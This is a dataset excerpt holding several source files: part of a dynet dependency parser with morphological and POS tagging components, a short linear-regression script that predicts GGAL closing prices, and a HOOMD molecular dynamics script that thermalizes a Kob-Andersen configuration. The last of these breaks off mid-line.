morph_encodings.append(encoding_morph)\n\n if self.morphFlag:\n upper_morph_encodings = []\n if self.morph_encoding_composition_type == \"morph_attention\":\n for idx, encoding in enumerate(morph_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morph_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morph_encodings):\n tmp.append(morph_encodings[idx+1])\n upper_morph_encodings.append(self.attend_encodings(tmp, self.morph_encoding_composition_type))\n else:\n upper_morph_encodings = morph_encodings\n\n if self.morph_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_morph_encodings):\n if index > 0:\n upper_morph_encodings [index] = \\\n self.morph_wsum_composition_alpha * upper_morph_encodings[index-1] + \\\n (1 - self.morph_wsum_composition_alpha) * upper_morph_encodings[index]\n \n for entry, morph in zip(conll_sentence, upper_morph_encodings):\n entry.vec = concatenate([entry.vec, morph])\n \n morphtag_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphTagFlag:\n if self.goldMorphTagFlag:\n morph_tags = entry.idMorphTags\n entry.pred_tags = entry.idMorphTags\n entry.pred_tags_tokens = [self.i2t[m_tag_id] for m_tag_id in entry.pred_tags]\n else: \n word_context = [c for i, c in enumerate(sentence_context) if i - 1 != idx]\n entry.pred_tags = self.generate(entry.char_rnn_states, word_context)\n morph_tags = entry.pred_tags\n entry.tags = entry.idMorphTags\n entry.pred_tags_tokens = [self.i2t[m_tag_id] for m_tag_id in entry.pred_tags]\n\n last_state_mtag = self.mtag_rnn.predict_sequence([self.tlookup[t] for t in morph_tags])[-1]\n rev_last_state_mtag = self.mtag_rnn.predict_sequence([self.tlookup[t] for t in reversed(morph_tags)])[-1]\n current_encoding_mtag = concatenate([last_state_mtag, rev_last_state_mtag]) \n morphtag_encodings.append(current_encoding_mtag)\n\n if self.morphTagFlag: \n upper_morphtag_encodings = []\n if self.mtag_encoding_composition_type == \"mtag_attention\":\n for idx, encoding in enumerate(morphtag_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morphtag_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morphtag_encodings):\n tmp.append(morphtag_encodings[idx+1])\n upper_morphtag_encodings.append(self.attend_encodings(tmp, self.mtag_encoding_composition_type))\n else:\n upper_morphtag_encodings = morphtag_encodings\n \n if self.mtag_wsum_composition_alpha != 0:\n for index, mtag in enumerate(upper_morphtag_encodings):\n if index > 0:\n upper_morphtag_encodings [index] = \\\n self.mtag_wsum_composition_alpha * upper_morphtag_encodings[index-1] + \\\n (1 - self.mtag_wsum_composition_alpha) * upper_morphtag_encodings[index]\n\n for entry, mtag in zip(conll_sentence, upper_morphtag_encodings):\n entry.vec = concatenate([entry.vec, mtag])\n\n\n for idx, entry in enumerate(conll_sentence):\n entry.pos_lstms = [entry.vec, entry.vec]\n entry.headfov = None\n entry.modfov = None\n\n entry.rheadfov = None\n entry.rmodfov = None\n\n #Predicted pos tags\n lstm_forward = self.pos_builders[0].initial_state()\n lstm_backward = self.pos_builders[1].initial_state()\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.pos_lstms[1] = lstm_forward.output()\n rentry.pos_lstms[0] = lstm_backward.output()\n\n for entry in conll_sentence:\n entry.pos_vec = concatenate(entry.pos_lstms)\n\n blstm_forward = self.pos_bbuilders[0].initial_state()\n blstm_backward = 
self.pos_bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.pos_vec)\n blstm_backward = blstm_backward.add_input(rentry.pos_vec)\n entry.pos_lstms[1] = blstm_forward.output()\n rentry.pos_lstms[0] = blstm_backward.output()\n\n concat_layer = [concatenate(entry.pos_lstms) for entry in conll_sentence]\n outputFFlayer = self.ffSeqPredictor.predict_sequence(concat_layer)\n predicted_pos_indices = [np.argmax(o.value()) for o in outputFFlayer]\n predicted_postags = [self.id2pos[idx] for idx in predicted_pos_indices]\n\n pos_encodings = []\n for entry, posid in zip(conll_sentence, predicted_pos_indices):\n pos_encodings.append(self.plookup[posid])\n upper_pos_encodings = []\n if self.pos_encoding_composition_type == \"pos_attention\":\n for idx, encoding in enumerate(pos_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(pos_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(pos_encodings):\n tmp.append(pos_encodings[idx+1])\n upper_pos_encodings.append(self.attend_encodings(tmp, self.pos_encoding_composition_type))\n else:\n upper_pos_encodings = pos_encodings\n\n if self.pos_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_pos_encodings):\n if index > 0:\n upper_pos_encodings [index] = \\\n self.pos_wsum_composition_alpha * upper_pos_encodings[index-1] + \\\n (1 - self.pos_wsum_composition_alpha) * upper_pos_encodings[index]\n for entry, pos in zip(conll_sentence, upper_pos_encodings):\n entry.vec = concatenate([entry.vec, pos])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n # Add predicted pos tags for parsing prediction\n for entry, posid in zip(conll_sentence, predicted_pos_indices):\n entry.vec = concatenate([entry.vec, self.plookup[posid]])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n if self.blstmFlag:\n lstm_forward = self.builders[0].initial_state()\n lstm_backward = self.builders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = lstm_forward.output()\n rentry.lstms[0] = lstm_backward.output()\n\n if self.bibiFlag:\n for entry in conll_sentence:\n entry.vec = concatenate(entry.lstms)\n\n blstm_forward = self.bbuilders[0].initial_state()\n blstm_backward = self.bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.vec)\n blstm_backward = blstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = blstm_forward.output()\n rentry.lstms[0] = blstm_backward.output()\n\n scores, exprs = self.__evaluate(conll_sentence)\n heads = decoder.parse_proj(scores)\n\n # Multiple roots: heading to the previous \"rooted\" one\n rootCount = 0\n rootWid = -1\n for index, head in enumerate(heads):\n if head == 0:\n rootCount += 1\n if rootCount == 1:\n rootWid = index\n if rootCount > 1:\n heads[index] = rootWid\n rootWid = index\n\n for entry, head, pos in zip(conll_sentence, heads, predicted_postags):\n entry.pred_parent_id = head\n entry.pred_relation = '_'\n entry.pred_pos = pos\n\n dump = False\n\n if self.labelsFlag:\n concat_layer = [self.__getRelVector(conll_sentence, head, modifier + 1) for modifier, head in\n enumerate(heads[1:])]\n outputFFlayer = self.ffRelPredictor.predict_sequence(concat_layer)\n predicted_rel_indices = [np.argmax(o.value()) for o in outputFFlayer]\n predicted_rels = [self.irels[idx] for idx 
in predicted_rel_indices]\n for modifier, head in enumerate(heads[1:]):\n conll_sentence[modifier + 1].pred_relation = predicted_rels[modifier]\n\n renew_cg()\n if not dump:\n yield sentence\n\n def morph2word(self, morph_dict):\n word_emb = {}\n for word in morph_dict.keys():\n morph_seg = morph_dict[word]\n\n word_vec = self.__getWordVector(morph_seg)\n word_emb[word] = word_vec.vec_value()\n renew_cg()\n return word_emb\n\n def morph(self):\n morph_dict = {}\n for morph in self.m2i.keys():\n morph_dict[morph] = self.__getMorphVector(morph).vec_value()\n renew_cg()\n return morph_dict\n\n def Train_Morph(self):\n self.trainer.set_sparse_updates(False)\n start = time.time()\n for iWord, word in enumerate(list(self.morph_dict.keys())):\n if iWord % 2000 == 0 and iWord != 0:\n print(\"Processing word number: %d\" % iWord, \", Time: %.2f\" % (time.time() - start))\n start = time.time()\n\n morph_seg = self.morph_dict[word]\n morph_vec = self.__getWordVector(morph_seg)\n\n if self.ext_embeddings is None:\n vec_gold = self.wlookup[int(self.vocab.get(word, 0))].vec_value()\n elif word in self.ext_embeddings:\n vec_gold = self.ext_embeddings[word]\n else:\n vec_gold = None\n\n if vec_gold is not None:\n y_gold = dynet.vecInput(self.wdims)\n y_gold.set(vec_gold)\n mErrs = self.cosine_proximity(morph_vec, y_gold)\n mErrs.backward()\n self.trainer.update()\n renew_cg()\n\n def embed_word(self, word):\n return [self.input_lookup[char] for char in word]\n\n def run_lstm(self, init_state, input_vecs):\n s = init_state\n out_vectors = []\n for vector in input_vecs:\n s = s.add_input(vector)\n out_vector = s.output()\n out_vectors.append(out_vector)\n return out_vectors\n\n def encode_word(self, word):\n word_rev = list(reversed(word))\n fwd_vectors = self.run_lstm(self.enc_fwd_lstm.initial_state(), word)\n bwd_vectors = self.run_lstm(self.enc_bwd_lstm.initial_state(), word_rev)\n bwd_vectors = list(reversed(bwd_vectors))\n vectors = [concatenate(list(p)) for p in zip(fwd_vectors, bwd_vectors)]\n return vectors\n\n def Train(self, conll_path):\n self.trainer.set_sparse_updates(True)\n eloss = 0.0\n mloss = 0.0\n eerrors = 0\n etotal = 0\n start = time.time()\n\n with open(conll_path, 'r') as conllFP:\n shuffledData = list(read_conll(conllFP, self.c2i, self.m2i, self.t2i, self.morph_dict))\n random.shuffle(shuffledData)\n\n errs = []\n lerrs = []\n posErrs = []\n segErrs = []\n mTagErrs = []\n\n for iSentence, sentence in enumerate(shuffledData):\n if iSentence % 500 == 0 and iSentence != 0:\n print(\"Processing sentence number: %d\" % iSentence, \", Loss: %.4f\" % (\n eloss / etotal), \", Time: %.2f\" % (time.time() - start))\n start = time.time()\n eerrors = 0\n eloss = 0.0\n etotal = 0\n\n conll_sentence = [entry for entry in sentence if isinstance(entry, utils.ConllEntry)]\n\n if self.morphTagFlag:\n sentence_context = []\n last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[self.c2i[\"\"]]])[-1]\n sentence_context.append(concatenate([last_state_char, rev_last_state_char]))\n for entry in conll_sentence:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])\n entry.char_rnn_states = [concatenate([f,b]) for f,b in zip(last_state_char, rev_last_state_char)]\n sentence_context.append(entry.char_rnn_states[-1])\n\n for idx, entry in enumerate(conll_sentence):\n 
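Train_Morph above fits morpheme-composed word vectors to pretrained embeddings by minimizing the negative cosine proximity defined in cosine_proximity. The quantity being minimized, restated in plain numpy (an illustrative sketch, not the dynet computation itself):

import numpy as np

def cosine_proximity(pred, gold, eps=np.finfo(float).eps):
    # negative cosine similarity: minimizing this aligns pred with gold
    p = pred / max(np.linalg.norm(pred), eps)
    g = gold / max(np.linalg.norm(gold), eps)
    return -float(p @ g)

print(cosine_proximity(np.array([1.0, 0.0]), np.array([2.0, 0.0])))  # -1.0 (aligned)
print(cosine_proximity(np.array([1.0, 0.0]), np.array([0.0, 3.0])))  # -0.0 (orthogonal)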
c = float(self.wordsCount.get(entry.norm, 0))\n dropFlag = (random.random() < (c / (0.25 + c)))\n #wordvec = self.wlookup[\n # int(self.vocab.get(entry.norm, 0)) if dropFlag else 0] if self.wdims > 0 else None\n \n wordvec = inputTensor(entry.embedding)\n\n if self.morphTagFlag :\n entry.vec = dynet.dropout(concatenate([wordvec, entry.char_rnn_states[-1]]), 0.33)\n else:\n last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in entry.idChars])[-1]\n rev_last_state_char = self.char_rnn.predict_sequence([self.clookup[c] for c in reversed(entry.idChars)])[-1]\n entry.vec = dynet.dropout(concatenate([wordvec, last_state_char, rev_last_state_char]), 0.33)\n \n morph_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphFlag:\n if len(entry.norm) > 2:\n if self.goldMorphFlag:\n seg_vec = self.__getSegmentationVector(entry.norm)\n seg_vec = dynet.vecInput(seg_vec.dim()[0][0])\n seg_vec.set(entry.idMorphs)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n else:\n seg_vec = self.__getSegmentationVector(entry.norm)\n morph_seg = utils.generate_morphs(entry.norm, seg_vec.vec_value())\n vec_gold = dynet.vecInput(seg_vec.dim()[0][0])\n vec_gold.set(entry.idMorphs)\n segErrs.append(self.binary_crossentropy(seg_vec,vec_gold))\n else:\n morph_seg = [entry.norm]\n\n last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in morph_seg])[-1]\n rev_last_state_morph = self.morph_rnn.predict_sequence([self.__getMorphVector(morph) for morph in reversed(morph_seg)])[\n -1]\n encoding_morph = concatenate([last_state_morph, rev_last_state_morph])\n morph_encodings.append(encoding_morph)\n \n if self.morphFlag:\n upper_morph_encodings = []\n if self.morph_encoding_composition_type == \"morph_attention\":\n for idx, encoding in enumerate(morph_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morph_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morph_encodings):\n tmp.append(morph_encodings[idx+1])\n upper_morph_encodings.append(self.attend_encodings(tmp, self.morph_encoding_composition_type))\n else:\n upper_morph_encodings = morph_encodings\n\n if self.morph_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_morph_encodings):\n if index > 0:\n upper_morph_encodings [index] = \\\n self.morph_wsum_composition_alpha * upper_morph_encodings[index-1] + \\\n (1 - self.morph_wsum_composition_alpha) * upper_morph_encodings[index]\n\n for entry, morph in zip(conll_sentence, upper_morph_encodings):\n entry.vec = concatenate([entry.vec, dynet.dropout(morph, 0.33)])\n\n\n morphtag_encodings = []\n for idx, entry in enumerate(conll_sentence):\n if self.morphTagFlag:\n if self.goldMorphTagFlag:\t\n morph_tags = entry.idMorphTags\n else:\n word_context = [c for i, c in enumerate(sentence_context) if i-1 != idx]\n mTagErrs.append(\n self.__getLossMorphTagging(entry.char_rnn_states, entry.idMorphTags, word_context))\n predicted_sequence = self.generate(entry.char_rnn_states, word_context)\n morph_tags = predicted_sequence\n\n last_state_mtag = self.mtag_rnn.predict_sequence([self.tlookup[t] for t in morph_tags])[-1]\n rev_last_state_mtag = \\\n self.mtag_rnn.predict_sequence([self.tlookup[t] for t in reversed(morph_tags)])[\n -1] \n current_encoding_mtag = concatenate([last_state_mtag, rev_last_state_mtag]) \n morphtag_encodings.append(current_encoding_mtag)\n \n if self.morphTagFlag:\n upper_morphtag_encodings = []\n if self.mtag_encoding_composition_type == \"mtag_attention\":\n for idx, encoding in 
enumerate(morphtag_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(morphtag_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(morphtag_encodings):\n tmp.append(morphtag_encodings[idx+1])\n upper_morphtag_encodings.append(self.attend_encodings(tmp, self.mtag_encoding_composition_type))\n else:\n upper_morphtag_encodings = morphtag_encodings\n if self.mtag_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_morphtag_encodings):\n if index > 0:\n upper_morphtag_encodings [index] = \\\n self.mtag_wsum_composition_alpha * upper_morphtag_encodings[index-1] + \\\n (1 - self.mtag_wsum_composition_alpha) * upper_morphtag_encodings[index]\n for entry, mtag in zip(conll_sentence, upper_morphtag_encodings):\n entry.vec = concatenate([entry.vec, dynet.dropout(mtag, 0.33)])\n\n for idx, entry in enumerate(conll_sentence):\n entry.pos_lstms = [entry.vec, entry.vec]\n entry.headfov = None\n entry.modfov = None\n\n entry.rheadfov = None\n entry.rmodfov = None\n\n #POS tagging loss\n lstm_forward = self.pos_builders[0].initial_state()\n lstm_backward = self.pos_builders[1].initial_state()\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.pos_lstms[1] = lstm_forward.output()\n rentry.pos_lstms[0] = lstm_backward.output()\n\n for entry in conll_sentence:\n entry.pos_vec = concatenate(entry.pos_lstms)\n\n blstm_forward = self.pos_bbuilders[0].initial_state()\n blstm_backward = self.pos_bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.pos_vec)\n blstm_backward = blstm_backward.add_input(rentry.pos_vec)\n entry.pos_lstms[1] = blstm_forward.output()\n rentry.pos_lstms[0] = blstm_backward.output()\n\n concat_layer = [dynet.dropout(concatenate(entry.pos_lstms), 0.33) for entry in conll_sentence]\n outputFFlayer = self.ffSeqPredictor.predict_sequence(concat_layer)\n posIDs = [self.pos.get(entry.pos) for entry in conll_sentence]\n for pred, gold in zip(outputFFlayer, posIDs):\n posErrs.append(self.pick_neg_log(pred, gold))\n\n pos_encodings = []\n for entry, poses in zip(conll_sentence, outputFFlayer):\n pos_encodings.append(self.plookup[np.argmax(poses.value())])\n upper_pos_encodings = []\n if self.pos_encoding_composition_type == \"pos_attention\":\n for idx, encoding in enumerate(pos_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(pos_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(pos_encodings):\n tmp.append(pos_encodings[idx+1])\n upper_pos_encodings.append(self.attend_encodings(tmp, self.pos_encoding_composition_type))\n else:\n upper_pos_encodings = pos_encodings\n\n if self.pos_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_pos_encodings):\n if index > 0:\n upper_pos_encodings [index] = \\\n self.pos_wsum_composition_alpha * upper_pos_encodings[index-1] + \\\n (1 - self.pos_wsum_composition_alpha) * upper_pos_encodings[index]\n\n for entry, pos in zip(conll_sentence, upper_pos_encodings):\n entry.vec = concatenate([entry.vec, dynet.dropout(pos, 0.33)])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n # Add predicted pos tags\n for entry, poses in zip(conll_sentence, outputFFlayer):\n entry.vec = concatenate([entry.vec, dynet.dropout(self.plookup[np.argmax(poses.value())], 0.33)])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n #Parsing losses\n if self.blstmFlag:\n lstm_forward = self.builders[0].initial_state()\n 
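The *_wsum_composition_alpha blocks above smooth each sequence of encodings left to right, mixing every vector with its already-smoothed predecessor. A tiny sketch of that recurrence (values chosen only to make the effect visible):

import numpy as np

def wsum_compose(encodings, alpha):
    # left-to-right mix: each vector absorbs a fraction alpha of the previous one
    out = [e.copy() for e in encodings]
    for i in range(1, len(out)):
        out[i] = alpha * out[i - 1] + (1 - alpha) * out[i]
    return out

seq = [np.array([1.0]), np.array([0.0]), np.array([0.0])]
print([v[0] for v in wsum_compose(seq, 0.5)])  # [1.0, 0.5, 0.25]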
lstm_backward = self.builders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = lstm_forward.output()\n rentry.lstms[0] = lstm_backward.output()\n\n if self.bibiFlag:\n for entry in conll_sentence:\n entry.vec = concatenate(entry.lstms)\n\n blstm_forward = self.bbuilders[0].initial_state()\n blstm_backward = self.bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.vec)\n blstm_backward = blstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = blstm_forward.output()\n rentry.lstms[0] = blstm_backward.output()\n\n scores, exprs = self.__evaluate(conll_sentence)\n gold = [entry.parent_id for entry in conll_sentence]\n heads = decoder.parse_proj(scores, gold if self.costaugFlag else None)\n\n if self.labelsFlag:\n\n concat_layer = [dynet.dropout(self.__getRelVector(conll_sentence, head, modifier + 1), 0.33) for\n modifier, head in enumerate(gold[1:])]\n outputFFlayer = self.ffRelPredictor.predict_sequence(concat_layer)\n relIDs = [self.rels[conll_sentence[modifier + 1].relation] for modifier, _ in enumerate(gold[1:])]\n for pred, goldid in zip(outputFFlayer, relIDs):\n lerrs.append(self.pick_neg_log(pred, goldid))\n\n e = sum([1 for h, g in zip(heads[1:], gold[1:]) if h != g])\n eerrors += e\n if e > 0:\n loss = [(exprs[h][i] - exprs[g][i]) for i, (h, g) in enumerate(zip(heads, gold)) if h != g] # * (1.0/float(e))\n eloss += (e)\n mloss += (e)\n errs.extend(loss)\n\n etotal += len(conll_sentence)\n\n if iSentence % 1 == 0:\n if len(errs) > 0 or len(lerrs) > 0 or len(posErrs) > 0 or len(segErrs) > 0 or len(mTagErrs) > 0:\n eerrs = (esum(errs + lerrs + posErrs + segErrs + mTagErrs))\n eerrs.scalar_value()\n eerrs.backward()\n self.trainer.update()\n errs = []\n lerrs = []\n posErrs = []\n segErrs = []\n mTagErrs = []\n\n renew_cg()\n\n print(\"Loss: %.4f\" % (mloss / iSentence))\n","sub_path":"learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":52994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"593917022","text":"from Common.get_data import get_data_yahoo\nfrom sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nimport numpy as np\n\ndf = get_data_yahoo('GGAL')\ndf['Close_Next'] = df['Close'].shift(-1).fillna(0)\n\nvariable_objetivo = 'Close_Next'\nvariables_independientes = ['Close','Open','High','Low']\n\nmodelo = LinearRegression()\nmodelo.fit(X=df[variables_independientes], y=df[variable_objetivo])\n\ndf['Close_Next_P'] = modelo.predict(df[variables_independientes])\n\nprint(df[['Date', 'Open', 'Close', 'Close_Next','Close_Next_P']].tail(30))\n\nfig, ax = plt.subplots(figsize=(16, 9))\nplt.title('{}'.format('GGAL'))\nplt.style.use('seaborn')\nax.plot(df['Date'], df['Close_Next'])\nax.plot(df['Date'], df['Close_Next_P'], label=\"Long EMA\", color=\"green\")\n\nax.set_xlabel('Date')\nax.set_ylabel('Adjusted closing price ($)')\nax.legend()\nplt.savefig(\"{}.png\".format('GGAL'))\nplt.close(fig)\nplt.clf()\n\nprint(np.sqrt(metrics.mean_squared_error(df['Close_Next'], 
df['Close_Next_P'])))","sub_path":"LinearRegression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589038014","text":"#!/usr/bin/python\n################################################################\n#\n# DESCRIPTION\n# This example reads a configuration from a .gsd file at temperature T_ini,\n# and thermalizes it at temperature T_final.\n#\n#\n# To display help:\n# python ReadAndThermalize.py --user=\"-h\"\n#\n# To launch a simulation:\n# python ReadAndThermalize.py --user=\"filename --dt=dt \"\n#\n# List of arguments:\n# filename\n# -N Natoms\n# -s seed (<0: /dev/urandom)\n# -t if>0:Max time steps, if<0: number of NVT steps between thermalization checks\n# -T temperature\n# --tauT tau of the thermostat\n# -d MD integration step dt\n# --thermostat thermostat\n################################################################\n\nfrom __future__ import print_function #for compatibility with python3.5\nimport hoomd #hoomd is the MD package from the Glotzer group\nfrom hoomd import md #md is the subsection strictly about the properties of the system\nimport sys #this has some system tools like sys.exit() that can be useful\nfrom os import remove #Used to remove the backup file at the end of the run\nimport argparse #for processing arguments\nimport numpy as np #Handles some mathematical operations\nfrom lib import module_potentials as pot\nfrom lib import module_measurements as med\nfrom lib import module_timelists as tl\nimport gsd.pygsd #gsd is the database type for the configurations\nimport gsd.hoomd #\n\n\nprint(\"hoomd version \",hoomd.__version__)\nprint(\"gsd version \",gsd.__version__)\n\n################################################################\n#\n# SET UP THE SIMULATION CONTEXT\n# \n################################################################\nhoomd.context.initialize()\nhoomd.option.set_notice_level(0)\nmore_arguments=hoomd.option.get_user() #These are the arguments that are not read by hoomd\n\n################################################################\n#\n# READ ARGUMENTS\n# Read command line arguments\n#\n# filename\n# -N Natoms\n# -s seed (<0: /dev/urandom)\n# -t if>0:Max time steps, if<0: number of NVT steps between thermalization checks\n# -T temperature\n# --tauT tau of the thermostat\n# -d MD integration step dt\n# --thermostat thermostat\n# --deltaHeavyTraj Every deltaHeavyTraj steps a configuration is saved. This configuration\n# can be used to calculate the self-intermediate scattering function or as\n# a starting point in case at some point crystallization was reached.\n#\n################################################################\nparser = argparse.ArgumentParser(add_help=True)\nparser.add_argument('filename', #positional argument\n nargs=1,\n help='name of the .gsd configuration we want to read'\n)\nparser.add_argument('-N','--Natoms', #mandatory\n nargs=1,\n type=int,\n required=True,\n help='number of atoms in the system'\n)\nparser.add_argument('-l','--label', #optional argument\n nargs=1,\n required=False,\n default=['thermalized'],\n help='basename for the output files'\n)\nparser.add_argument('-s','--seed', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[-1],\n help='seed for random numbers. 
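The seed convention documented above (a negative seed means "take entropy from /dev/urandom") can be implemented with a small helper; this is a sketch of one way to do it, and the helper name resolve_seed is made up for illustration:

import os

def resolve_seed(seed):
    # negative seed -> draw 4 random bytes from the OS entropy pool
    if seed < 0:
        return int.from_bytes(os.urandom(4), "little")
    return seed

print(resolve_seed(-1))   # some OS-provided value
print(resolve_seed(42))   # 42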
If negative we get it from /dev/urandom'\n)\nparser.add_argument('-t','--nNVTsteps', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[10000],\n help='It is the total length of the run (mind that the run often starts at t>0, since we read a backup file). Cannot be negative.'\n)\nparser.add_argument('-T','--temperature', #optional argument\n nargs=1,\n type=float,\n required=False,\n default=[5],\n help='target Temperature'\n)\nparser.add_argument('--tauT', #optional argument\n nargs=1,\n type=float,\n required=False,\n default=[1.0],\n help='tau of the thermostat'\n)\nparser.add_argument('--dt', #optional argument\n nargs=1,\n type=float,\n required=False,\n default=[0.002],\n help='dt for MD integration'\n)\nparser.add_argument('--thermostat', #optional argument\n nargs=1,\n required=False,\n default=['NVE'],\n help='basename of the output files'\n)\n\nparser.add_argument('--heavyTrajFreq', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[0],\n help='interval between heavy trajectory backups (default:0, means no backups)'\n)\nparser.add_argument('--backupFreq', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[0],\n help='interval between backups (default:0, means no backups)'\n)\nparser.add_argument('--iframe', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[0],\n help='Specify from which frame of the gsd file we want the starting configuration (default:0, the first frame)'\n)\nparser.add_argument('--trajFreq', #optional argument\n type=int,\n required=False,\n default=[0],\n help='save trajectory every trajFreq steps (default:0, means no trajectory). If negative, use a logarithmic succession\\\n of times, where -trajFreq is the number of configurations in the trajectory (or slightly less, since some times two \\\n logarithmic times correspond to the same integer time step).'\n)\nparser.add_argument('--addsteps', #optional argument\n type=bool,\n required=False,\n default=[False],\n help='If True, nNVTsteps are done from the input configuration. If False, we substract ini_step. [Default: False]'\n)\nparser.add_argument('--startfromzero', #optional argument\n type=bool,\n required=False,\n default=[False],\n help='If True, the time step is set to zero once the configuration is read. 
[Default: False]'\n)\nargs = parser.parse_args(more_arguments)\nfilename=args.filename[0]\nNatoms=args.Natoms[0]\nlabel=args.label[0]\nseed=args.seed[0]\nheavyTrajFreq=args.heavyTrajFreq[0]\nbackupFreq=args.backupFreq[0]\ntrajFreq=args.trajFreq[0] if isinstance(args.trajFreq, list) else args.trajFreq # the default is a list, a user-supplied value is a scalar\niframe=args.iframe[0]\naddsteps=args.addsteps[0] if isinstance(args.addsteps, list) else args.addsteps\nstartfromzero=args.startfromzero[0] if isinstance(args.startfromzero, list) else args.startfromzero\n\nnNVTsteps=args.nNVTsteps[0]\n\nTemperatureGoal=args.temperature[0]\ntauT=args.tauT[0]\ndt=args.dt[0]\nthermostat=args.thermostat[0]\ndel parser\n\nif seed>0:\n    np.random.seed(seed)\nprint(\"Input configuration: \",filename)\nprint(\"Natoms = \",Natoms)\nprint(\"seed = \",seed)\nprint(\"nNVTsteps = \",nNVTsteps)\nprint(\"T = \",TemperatureGoal)\nprint(\"tauT = \",tauT)\nprint(\"dt = \",dt)\nprint(\"thermostat = \",thermostat)\nprint(\"label = \",label)\nassert(nNVTsteps>0)\nassert(TemperatureGoal>0)\nassert(tauT>0)\nassert(dt>0 and dt<0.1)\n\n################################################################\n#\n# READ CONFIGURATION\n#\n################################################################\nbackupname=label+\"_backup.gsd\"\nsystem = hoomd.init.read_gsd(filename=filename, restart=backupname, frame=iframe)\nprint(\"The read configuration has \",len(system.particles),\" particles\")\nassert(Natoms==len(system.particles))\niniStep=hoomd.get_step()\nprint(\"iframe: \",iframe)\nprint(\"Initial step: \",iniStep)\n\n\n################################################################\n# \n# SET UP POTENTIAL\n#\n################################################################\nNeighborsListLJ = md.nlist.cell()\nprint(\" *** Setting Kob-Andersen Potential *** \")\nif Natoms<500:\n\tmyLjPair=pot.KApotentialShort(NeighborsListLJ)\nelse:\n\tmyLjPair=pot.KApotential(NeighborsListLJ)\n\n################################################################\n# \n# SET UP ANALYZER\n#\n################################################################\nprint(\"\\n\\n\\nSET UP ANALYZER\\n\")\n\n#Name of the log\nlogname=label+\".txt\"\n\n#These are the observables we want to log\nanalyzerManyVariables_quantities = ['temperature', 'pressure', 'potential_energy', 'kinetic_energy', 'momentum'] #, 'volume', 'num_particles']\n\nprint(\"In \",logname,\" we write \",analyzerManyVariables_quantities)\n\n#Every how many integrations we want to log the observables\nanalyzer_period=int(5./dt) #Take measurements once every 5 Lennard Jones times\nanalyzerManyVariables = hoomd.analyze.log(filename=logname, \\\n                                          quantities=analyzerManyVariables_quantities, period=analyzer_period, \\\n                                          header_prefix = '#seed:'+str(seed)+\"\\n#\", \\\n                                          overwrite=False,\n                                          phase=0)\n\n\n################################################################\n# \n# INTEGRATION\n# \n################################################################\n\nrunSteps = max(0,nNVTsteps-iniStep) if addsteps==False else nNVTsteps #If negative, we run no steps\nprint(\"runSteps = \",runSteps)\n\n\nmd.integrate.mode_standard(dt=dt)\nmd.update.zero_momentum(phase=-1)\nif backupFreq>0:\n    